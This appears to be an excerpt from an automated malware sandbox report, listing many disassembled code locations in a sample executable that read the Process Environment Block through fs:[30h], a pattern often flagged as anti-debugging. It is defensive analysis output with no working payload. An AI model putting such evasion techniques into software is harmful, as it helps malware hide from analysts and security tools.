Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32894180 mov eax, dword ptr fs:[00000030h]	3_2_32894180
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1190 mov eax, dword ptr fs:[00000030h]	3_2_328D1190
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1190 mov eax, dword ptr fs:[00000030h]	3_2_328D1190
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B9194 mov eax, dword ptr fs:[00000030h]	3_2_328B9194
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329651B6 mov eax, dword ptr fs:[00000030h]	3_2_329651B6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE1A4 mov eax, dword ptr fs:[00000030h]	3_2_328CE1A4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE1A4 mov eax, dword ptr fs:[00000030h]	3_2_328CE1A4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C41BB mov ecx, dword ptr fs:[00000030h]	3_2_328C41BB
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C41BB mov eax, dword ptr fs:[00000030h]	3_2_328C41BB
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C41BB mov eax, dword ptr fs:[00000030h]	3_2_328C41BB
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A01C0 mov eax, dword ptr fs:[00000030h]	3_2_328A01C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A01C0 mov eax, dword ptr fs:[00000030h]	3_2_328A01C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A51C0 mov eax, dword ptr fs:[00000030h]	3_2_328A51C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A51C0 mov eax, dword ptr fs:[00000030h]	3_2_328A51C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A51C0 mov eax, dword ptr fs:[00000030h]	3_2_328A51C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A51C0 mov eax, dword ptr fs:[00000030h]	3_2_328A51C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328881EB mov eax, dword ptr fs:[00000030h]	3_2_328881EB
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A1E3 mov eax, dword ptr fs:[00000030h]	3_2_3289A1E3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A1E3 mov eax, dword ptr fs:[00000030h]	3_2_3289A1E3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A1E3 mov eax, dword ptr fs:[00000030h]	3_2_3289A1E3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A1E3 mov eax, dword ptr fs:[00000030h]	3_2_3289A1E3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A1E3 mov eax, dword ptr fs:[00000030h]	3_2_3289A1E3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0 mov eax, dword ptr fs:[00000030h]	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328991E5 mov eax, dword ptr fs:[00000030h]	3_2_328991E5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328991E5 mov eax, dword ptr fs:[00000030h]	3_2_328991E5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328891F0 mov eax, dword ptr fs:[00000030h]	3_2_328891F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328891F0 mov eax, dword ptr fs:[00000030h]	3_2_328891F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A01F1 mov eax, dword ptr fs:[00000030h]	3_2_328A01F1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A01F1 mov eax, dword ptr fs:[00000030h]	3_2_328A01F1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A01F1 mov eax, dword ptr fs:[00000030h]	3_2_328A01F1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329581EE mov eax, dword ptr fs:[00000030h]	3_2_329581EE
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329581EE mov eax, dword ptr fs:[00000030h]	3_2_329581EE
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF1F0 mov eax, dword ptr fs:[00000030h]	3_2_328BF1F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF1F0 mov eax, dword ptr fs:[00000030h]	3_2_328BF1F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B510F mov eax, dword ptr fs:[00000030h]	3_2_328B510F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289510D mov eax, dword ptr fs:[00000030h]	3_2_3289510D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C0118 mov eax, dword ptr fs:[00000030h]	3_2_328C0118
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113 mov eax, dword ptr fs:[00000030h]	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291A130 mov eax, dword ptr fs:[00000030h]	3_2_3291A130
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C7128 mov eax, dword ptr fs:[00000030h]	3_2_328C7128
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C7128 mov eax, dword ptr fs:[00000030h]	3_2_328C7128
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F13E mov eax, dword ptr fs:[00000030h]	3_2_3294F13E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32963157 mov eax, dword ptr fs:[00000030h]	3_2_32963157
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32963157 mov eax, dword ptr fs:[00000030h]	3_2_32963157
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32963157 mov eax, dword ptr fs:[00000030h]	3_2_32963157
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288A147 mov eax, dword ptr fs:[00000030h]	3_2_3288A147
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288A147 mov eax, dword ptr fs:[00000030h]	3_2_3288A147
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288A147 mov eax, dword ptr fs:[00000030h]	3_2_3288A147
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C415F mov eax, dword ptr fs:[00000030h]	3_2_328C415F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3292314A mov eax, dword ptr fs:[00000030h]	3_2_3292314A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3292314A mov eax, dword ptr fs:[00000030h]	3_2_3292314A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3292314A mov eax, dword ptr fs:[00000030h]	3_2_3292314A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3292314A mov eax, dword ptr fs:[00000030h]	3_2_3292314A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C716D mov eax, dword ptr fs:[00000030h]	3_2_328C716D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32896179 mov eax, dword ptr fs:[00000030h]	3_2_32896179
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328E717A mov eax, dword ptr fs:[00000030h]	3_2_328E717A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328E717A mov eax, dword ptr fs:[00000030h]	3_2_328E717A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291C691 mov eax, dword ptr fs:[00000030h]	3_2_3291C691
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680 mov eax, dword ptr fs:[00000030h]	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290D69D mov eax, dword ptr fs:[00000030h]	3_2_3290D69D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F68C mov eax, dword ptr fs:[00000030h]	3_2_3294F68C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32898690 mov eax, dword ptr fs:[00000030h]	3_2_32898690
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329586A8 mov eax, dword ptr fs:[00000030h]	3_2_329586A8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329586A8 mov eax, dword ptr fs:[00000030h]	3_2_329586A8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328906CF mov eax, dword ptr fs:[00000030h]	3_2_328906CF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295A6C0 mov eax, dword ptr fs:[00000030h]	3_2_3295A6C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BD6D0 mov eax, dword ptr fs:[00000030h]	3_2_328BD6D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290C6F2 mov eax, dword ptr fs:[00000030h]	3_2_3290C6F2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290C6F2 mov eax, dword ptr fs:[00000030h]	3_2_3290C6F2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328896E0 mov eax, dword ptr fs:[00000030h]	3_2_328896E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328896E0 mov eax, dword ptr fs:[00000030h]	3_2_328896E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289C6E0 mov eax, dword ptr fs:[00000030h]	3_2_3289C6E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328956E0 mov eax, dword ptr fs:[00000030h]	3_2_328956E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328956E0 mov eax, dword ptr fs:[00000030h]	3_2_328956E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328956E0 mov eax, dword ptr fs:[00000030h]	3_2_328956E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B66E0 mov eax, dword ptr fs:[00000030h]	3_2_328B66E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B66E0 mov eax, dword ptr fs:[00000030h]	3_2_328B66E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C360F mov eax, dword ptr fs:[00000030h]	3_2_328C360F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BD600 mov eax, dword ptr fs:[00000030h]	3_2_328BD600
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BD600 mov eax, dword ptr fs:[00000030h]	3_2_328BD600
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F607 mov eax, dword ptr fs:[00000030h]	3_2_3294F607
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964600 mov eax, dword ptr fs:[00000030h]	3_2_32964600
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32923608 mov eax, dword ptr fs:[00000030h]	3_2_32923608
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32918633 mov esi, dword ptr fs:[00000030h]	3_2_32918633
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32918633 mov eax, dword ptr fs:[00000030h]	3_2_32918633
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32918633 mov eax, dword ptr fs:[00000030h]	3_2_32918633
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32897623 mov eax, dword ptr fs:[00000030h]	3_2_32897623
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32895622 mov eax, dword ptr fs:[00000030h]	3_2_32895622
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32895622 mov eax, dword ptr fs:[00000030h]	3_2_32895622
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CC620 mov eax, dword ptr fs:[00000030h]	3_2_328CC620
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CF63F mov eax, dword ptr fs:[00000030h]	3_2_328CF63F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CF63F mov eax, dword ptr fs:[00000030h]	3_2_328CF63F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32890630 mov eax, dword ptr fs:[00000030h]	3_2_32890630
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C0630 mov eax, dword ptr fs:[00000030h]	3_2_328C0630
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293D62C mov ecx, dword ptr fs:[00000030h]	3_2_3293D62C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293D62C mov ecx, dword ptr fs:[00000030h]	3_2_3293D62C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293D62C mov eax, dword ptr fs:[00000030h]	3_2_3293D62C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D64A mov eax, dword ptr fs:[00000030h]	3_2_3288D64A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D64A mov eax, dword ptr fs:[00000030h]	3_2_3288D64A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32893640 mov eax, dword ptr fs:[00000030h]	3_2_32893640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF640 mov eax, dword ptr fs:[00000030h]	3_2_328AF640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF640 mov eax, dword ptr fs:[00000030h]	3_2_328AF640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF640 mov eax, dword ptr fs:[00000030h]	3_2_328AF640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CC640 mov eax, dword ptr fs:[00000030h]	3_2_328CC640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CC640 mov eax, dword ptr fs:[00000030h]	3_2_328CC640
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C265C mov eax, dword ptr fs:[00000030h]	3_2_328C265C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C265C mov ecx, dword ptr fs:[00000030h]	3_2_328C265C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C265C mov eax, dword ptr fs:[00000030h]	3_2_328C265C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C5654 mov eax, dword ptr fs:[00000030h]	3_2_328C5654
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C666D mov esi, dword ptr fs:[00000030h]	3_2_328C666D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C666D mov eax, dword ptr fs:[00000030h]	3_2_328C666D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C666D mov eax, dword ptr fs:[00000030h]	3_2_328C666D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A3660 mov eax, dword ptr fs:[00000030h]	3_2_328A3660
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A3660 mov eax, dword ptr fs:[00000030h]	3_2_328A3660
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A3660 mov eax, dword ptr fs:[00000030h]	3_2_328A3660
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32887662 mov eax, dword ptr fs:[00000030h]	3_2_32887662
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32887662 mov eax, dword ptr fs:[00000030h]	3_2_32887662
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32887662 mov eax, dword ptr fs:[00000030h]	3_2_32887662
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32890670 mov eax, dword ptr fs:[00000030h]	3_2_32890670
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2670 mov eax, dword ptr fs:[00000030h]	3_2_328D2670
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2670 mov eax, dword ptr fs:[00000030h]	3_2_328D2670
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E79D mov eax, dword ptr fs:[00000030h]	3_2_3290E79D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B781 mov eax, dword ptr fs:[00000030h]	3_2_3296B781
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B781 mov eax, dword ptr fs:[00000030h]	3_2_3296B781
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C1796 mov eax, dword ptr fs:[00000030h]	3_2_328C1796
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C1796 mov eax, dword ptr fs:[00000030h]	3_2_328C1796
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329617BC mov eax, dword ptr fs:[00000030h]	3_2_329617BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328907A7 mov eax, dword ptr fs:[00000030h]	3_2_328907A7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3295D7A7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3295D7A7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3295D7A7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F7CF mov eax, dword ptr fs:[00000030h]	3_2_3294F7CF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE7E0 mov eax, dword ptr fs:[00000030h]	3_2_328BE7E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328937E4 mov eax, dword ptr fs:[00000030h]	3_2_328937E4
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328977F9 mov eax, dword ptr fs:[00000030h]	3_2_328977F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328977F9 mov eax, dword ptr fs:[00000030h]	3_2_328977F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F717 mov eax, dword ptr fs:[00000030h]	3_2_3294F717
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B270D mov eax, dword ptr fs:[00000030h]	3_2_328B270D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B270D mov eax, dword ptr fs:[00000030h]	3_2_328B270D
